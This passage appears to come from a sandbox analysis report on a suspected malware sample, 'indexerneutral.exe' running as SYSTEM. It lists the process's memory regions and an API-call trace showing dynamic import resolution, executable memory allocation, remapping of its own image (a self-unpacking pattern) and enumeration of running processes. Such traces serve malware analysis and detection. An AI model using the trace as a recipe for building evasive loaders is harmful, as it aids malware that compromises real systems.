0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2216 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2217 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2218 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2219 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2220 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2221 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2222 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2223 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2224 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 431 os_tid = 0xfac Thread: id = 432 os_tid = 0xfa4 Thread: id = 433 os_tid = 0xf94 Thread: id = 434 os_tid = 0xf90 Thread: id = 449 os_tid = 0xca0 Process: id = "21" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x50ba5000" os_pid = "0xad0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2728 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2729 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2730 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2731 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2732 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2733 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2734 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exexe" filename = "\\Windows\\SysWOW64\\indexerneutral.exexe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exexe") Region: id = 2735 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2736 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2737 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2738 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2739 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2740 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2741 start_va = 0x7fff0000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2742 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2743 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 2744 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2745 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2746 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2747 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2748 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2749 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2750 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2751 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2752 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2753 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2754 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 2755 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2756 start_va = 0x746b0000 end_va = 0x74740fff entry_point = 0x746b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2757 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2758 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2759 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2760 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2761 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2762 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2763 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2764 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2765 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2766 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2767 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2768 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2769 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2770 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2771 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2772 start_va = 0x2d0000 end_va = 0x2e4fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2773 start_va = 0x310000 end_va = 0x3cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 2774 start_va = 0x6b0000 end_va = 0x837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2775 start_va = 0x840000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2776 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 2988 start_va = 0x3d0000 end_va = 0x3e3fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2989 start_va = 0x580000 end_va = 0x599fff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2990 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2991 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2992 start_va = 0x9d0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2993 start_va = 0x420000 end_va = 0x433fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2994 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2995 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2996 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2997 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2998 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2999 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3000 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3001 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3002 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3003 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3004 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3005 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3006 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3007 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3008 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3009 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3010 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3011 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3012 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3013 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3014 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3015 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3016 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3017 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3018 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3019 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3020 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3021 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3022 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3023 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3024 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3025 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3026 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3027 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3028 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3029 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3030 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3031 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3032 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3033 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3034 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3035 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3036 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3037 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3038 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3039 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3040 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3041 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3042 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3043 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3044 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3045 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3046 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Thread: id = 436 os_tid = 0xbf8 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0142.404] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x74f40000 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcAddress") returned 0x74f57940 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="SetFilePointer") returned 0x74f66530 [0142.404] GetProcAddress (hModule=0x74f40000, lpProcName="lstrlenA") returned 0x74f63a30 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="lstrcatA") returned 0x74f5efc0 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualProtect") returned 0x74f58c50 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="UnmapViewOfFile") returned 0x74f594b0 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="GetModuleHandleA") returned 0x74f59640 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="WriteFile") returned 0x74f66590 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="CloseHandle") returned 0x74f65f20 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualFree") returned 0x74f58c70 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="GetTempPathA") returned 0x74f66410 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="CreateFileA") returned 0x74f66170 [0142.405] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0142.406] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x3d0000 [0142.407] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x580000 [0142.408] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0142.409] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0142.409] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0142.409] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0142.409] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0142.410] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0142.414] GetCurrentProcessId () returned 0xad0 [0142.414] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc [0142.419] Process32FirstW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.420] GetCurrentProcessId () returned 0xad0 [0142.420] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x67, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.420] GetCurrentProcessId () returned 0xad0 [0142.420] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.421] GetCurrentProcessId () returned 0xad0 [0142.421] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.422] GetCurrentProcessId () returned 0xad0 [0142.422] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.422] GetCurrentProcessId () returned 0xad0 [0142.423] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.423] GetCurrentProcessId () returned 0xad0 [0142.423] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.424] GetCurrentProcessId () returned 0xad0 [0142.424] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.425] GetCurrentProcessId () returned 0xad0 [0142.425] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.425] GetCurrentProcessId () returned 0xad0 [0142.425] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.426] GetCurrentProcessId () returned 0xad0 [0142.426] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.427] GetCurrentProcessId () returned 0xad0 [0142.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.427] GetCurrentProcessId () returned 0xad0 [0142.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.428] GetCurrentProcessId () returned 0xad0 [0142.428] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, 